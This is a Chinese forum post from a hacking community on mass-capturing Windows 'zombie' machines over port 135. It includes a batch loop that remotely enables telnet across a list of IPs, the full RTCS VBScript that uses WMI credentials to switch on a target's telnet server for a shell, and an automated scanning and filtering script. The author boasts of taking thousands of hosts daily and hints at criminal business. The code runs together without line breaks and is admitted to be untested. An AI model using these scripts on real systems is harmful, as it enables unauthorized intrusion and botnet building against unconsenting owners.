135批量抓肉鸡 批量开TELNET

推荐:135批量抓肉鸡 批量开TELNET
关于135抓肉鸡的分析最近好象135搞的很火热 看见有人也把那个批量抓135肉鸡的工具发出来了我也就说下把反正俺也不早就不用那鸟东西了上次看了那个也说一天抓1000只肉鸡 由于我是开快进看的 没仔细的看 我以为他是自动登陆telnet所以我就晕死了 应为自动登陆telnet我以前研究很多 我由于我批处理我学的不怎么样也就会点皮毛就加了他结果他一上来就开口批量开23卖2000RMB 人品啊 我倒 那鸟东西不清楚大家知道作者不 那是02年安全焦点的大哥写的 我有RT整个全套代码的一万年前我就知道怎么批量开23了 不废话了先说其他的把 后来一位大哥把他的RT整套脚本整合写了一个RCMD1。05这个是目前的最新版好象需要解决的问题我详细的说一下把首先要解决的就是批量开23了rtcs脚本（百度一下有下的找不到就是搜索水品问题了） 里面的代码如果懂VBS的朋友去看下 就是先用VBS远程连接主机的wmi服务 然后剩下的是开启和过认证部分以前有一篇文章分析过说是作者写的有一个小BUG 就是如果原来已经开启的话可以直接转到退出的 这里不多说这个了 for /f delims=%%i in (nt.txt) do del %%i.batfor /f delims= %%i in (nt.txt) do echogoto start>>%%i.batfor /f delims= %%i in (nt.txt) do echo:start>>%%i.batfor /f delims= %%i in (nt.txt) do echo cscriptrtcs.vbe %%i administrator 1 23^|find shell>>%%i.batfor /fdelims= %%i in (nt.txt) do echo if errorlevel=1 gotob>>%%i.batfor /f delims= %%i in (nt.txt) do echo if errorlevel=0goto d>>%%i.batfor /f delims= %%i in (nt.txt) do echo:d>>%%i.batfor /f delims= %%i in (nt.txt) do echo SecureCRT.EXE%%i&goto exit>>%%i.batfor /f delims= %%i in (nt.txt) do echo:b>>%%i.batfor /f delims= %%i in (nt.txt) do echo cscriptrtcs.vbe %%i administrator 1 23^|find error>>%%i.batfor /fdelims= %%i in (nt.txt) do echo if errorlevel=1 gotostart>>%%i.batfor /f delims= %%i in (nt.txt) do echo iferrorlevel=0 goto exit>>%%i.batfor /f delims= %%i in (nt.txt) doecho :exit>>%%i.batfor /f delims= %%i in (nt.txt) do echoexit>>%%i.batfor /f delims= %%i in (nt.txt) do start%%i.batexit这个是我以前写的一个批处理 有兴趣的朋友可以看下 其实很简单 外面流传的需要过滤23 我的不需要过滤23有兴趣的朋友可以看下 代码正确性没测试应为我写过好几个版本现在已经不记得哪个是可以用的了但是思路很明显的相信大家可以看明白要解决的问题二我也尝试了用脚本来实现先telnet ip 然后sendkey 后来发现问题大大的只能一个一个种植不能实现批量种植 后来朋友给冰冰批量 就是现在大家可以在外面找的版本 他很好的解决了批量登陆和自动种植的问题 调用辅助工具设置登陆脚本然后自动种植 但是我相信用的朋友一定知道有什么问题 telnet认证是很复杂的 此外容易出现提示丢失脚本的错误其他的不知道说什么了 我今天上网给朋友搞东西 弄的累的要死 思路不是很清楚我在总结下把首先写一个S扫描的BAT然后里面用FOR循环自动整理IP 然后NT过滤 然后调用上面我发的批处理批量开23然后写一个批处理直接调用辅助工具自动登陆自动种植 效果如何 大家详细的去看动画就知道了 而后来我写的一个版本 就很帅了 嘿嘿 保密中 应为工具是给兄弟群共享的 他们有业务来着 如果我把东西发布了说是会干掉我 怕怕给会懂VBS的朋友说一下把 引导一下思路前面的扫描和和NT过滤还是一样的不说了 远程连接wmi大家可以看rtcs的脚本关键地方就是下面了难道远程连接到了wmi服务就只有开telnet一条出路吗 貌似wmi功能多多把具体能干什么去看安焦点rtcs作者02年的文章把 目前我写的脚本和所有的工具打包起来也才70多K 同时开4个服务器一天抓1万只肉鸡 信不信由你 相信大家都知道recton里有一个http种植者的功能把 去找找文章看人家怎么实现的 最近风声很紧有业务的朋友最好小心 最近的通道不是那么安全这个是rtcs的代码 自己保存成VBSon error resume nextif(lcase(right(wscript.fullname,11))=wscript.exe) thensetobjShell=wscript.createObject(wscript.shell)objShell.Run(cmd.exe /kcscript //nologo&chr(34)&wscript.scriptfullname&chr(34))wscript.quitendifif wscript.arguments.count<5 thenusage()wscript.echo Not enoughparameters.wscript.quitendifipaddress=wscript.arguments(0)username=wscript.arguments(1)password=wscript.arguments(2)ntlm=wscript.arguments(3)port=wscript.arguments(4)ifpassword=chr(34)&chr(34) then password=NULLif ntlm<0 orntlm>2 thenusage()wscript.echo The value of NTML iswrong.wscript.quitend ifusage()wscript.echo Conneting&ipaddress&....setobjlocator=createobject(wbemscripting.swbemlocator)setobjswbemservices=objlocator.connectserver(ipaddress,root/default,username,password)showerror(err.number)wscript.echoSetting NTLM=&ntlm&....setobjinstance=objswbemservices.get(stdregprov)setobjmethod=objinstance.methods_(SetDWORDvalue)setobjinparam=objmethod.inparameters.spawninstance_()objinparam.hdefkey=&h80000002objinparam.ssubkeyname=SOFTWARE\Microsoft\TelnetServer\1.0objinparam.svaluename=NTLMobjinparam.uvalue=ntlmsetobjoutparam=objinstance.execmethod_(SetDWORDvalue,objinparam)showerror(objoutparam.returnvalue)wscript.echoSettingport=&port&....objinparam.svaluename=TelnetPortobjinparam.uvalue=portsetobjoutparam=objinstance.execmethod_(SetDWORDvalue,objinparam)showerror(objoutparam.returnvalue)wscript.echoQuerying state of telnet server....setobjswbemservices=objlocator.connectserver(ipaddress,root\cimv2,username,password)setcolinstances=objswbemservices.execquery(select * from win32_servicewhere name=tlntsvr)for each objinstance in colinstancesifobjinstance.startmode=Disabled thenwscript.echo Telnet server has beendisabled. Now changeing start mode to manual....setobjmethod=objinstance.methods_(changestartmode)setobjinparam=objmethod.inparameters.spawninstance_()objinparam.startmode=Manualsetobjoutparam=objinstance.execmethod_(changestartmode,objinparam)showerror(objoutparam.returnvalue)endifwscript.echo Changeing state....if objinstance.started=truethenintstatus=objinstance.stopservice()showerror(intstatus)wscript.echoTarget telnet server has been STOPSuccessfully.elseintstatus=objinstance.startservice()showerror(intstatus)wscript.echoTarget telnet server has been START Successfully!wscript.echo Now, youcan try: telnet &ipaddress& &port&, to get a shell.endifnextfunction showerror(errornumber)if errornumber<>0thenwscript.echo Error!wscript.quitelsewscript.echo OK!end ifendfunctionfunction usage()wscript.echo************************************************************************wscript.echoRTCS v1.08wscript.echo Remote Telnet Configure Script, byzzzevazzzwscript.echo Welcome to visite www.isgrey.comwscript.echoUsage:wscript.echo cscript &wscript.scriptfullname& targetIPusername password NTLMAuthor telnetportwscript.echo It will auto changestate of target telnet server.wscript.echo************************************************************************endfunction经典吧，呵呵，我觉得，呵呵，管理员要给我加钱啊，呵呵关于for循环 我解释下for /f这个这个参数表示对文本操作tokens表示截取 tokens=1,2表示选取1，2两个部分 eol表示忽略 eol=-表示忽略-开始的行 delims表示分割符delims=,表示对每行以“，”为分割符号对行进行分割字符那么我给大家写一个S扫描自动整理IP的批处理把s.batsetlocalclscolor Atitle 自动抓鸡v1.0echo======================================================echo 自动抓鸡v1.0echo作者：hurrytigarecho QQ:30144942echoemil:hurrytigar@163.comecho hacked by hurrytigarecho======================================================del result.txtdels.txtfor /f eol= tokens=1,2 delims= %%i in (ip.txt) do s tcp %%i %%j135 1000 /savefor /f eol=- tokens=1 delims= %%i in (result.txt) do echo%%i>>s1.txtfor /f eol=P tokens=1 delims= %%i in (s1.txt) do echo%%i>>s2.txtfor /f eol=S tokens=1 delims= %%i in (s2.txt) do echo%%i>>s.txtdel s1.txtdel s2.txtdel Result.txt扫描那行的FOR循环 for /feol= tokens=1,2 delims= %%i in (ip.txt) do s tcp %%i %%j 135 1000/save意思是说 从ip.txt中对每行以空格分割 然后取得分割后的第一部分和第二部分字符第一个%%i是形参 代替你要取出来的部分那么后面的2个部分的%%i 和%%j表示取出的两个部分按顺序代替的参数了后面的几行都是扫描完成的result过滤整理 先忽略以空格 - PS开头的行 然后用echo写入文本来转的 用法 大家把上面的批处理代码保存成s.bat然后在同一目录建立一个ip.txt的文本然后把下面的这些复制进IP。TXT里面 （不需要整理 直接全放进去汉字不需要去掉）扫描和整理结束以后会有一个S。TXT文本 自己打开看看效果把 ^_^ 忘了说了把s.exeip.txt和s.bat放在同一目录 好了我闪了

天书~


看不懂咯~

[发帖际遇]: lm_Hitman酒后驾驶, 被警察逮住罚款金币7.